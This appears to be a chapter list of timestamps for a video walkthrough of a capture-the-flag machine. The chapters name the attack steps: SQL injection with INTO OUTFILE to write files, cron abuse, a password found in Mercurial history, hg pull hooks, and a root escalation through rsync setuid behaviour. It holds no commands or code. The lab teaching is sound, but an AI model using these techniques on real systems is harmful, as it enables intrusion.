33:50
Using INTO OUTFILE with our SQL Injection to write files and exploit the DBMON
41:30
Shell returned looking at the database, then exploiting another cron because w
45:20
Looking at the commit history of an Mercurial HG repo and finding a password
49:05
We can run HG PULL as dev, showing there are multiple places we can put a HGRC
57:05
We can run rsync as root, but the standard gtfobin doesn't work
1:00:00
Showing the chown flag doesn't remove setuid bits in RSYNC, which lets us make
1:03:00
BEYOND ROOT: Showing the changes to the box (secure_file_priv and AppArmor) th
1:08:49
Showing the CHOWN removes SetUID but Rsync does not when changing owners
🎓
Tutor Explanation
DeepCamp AI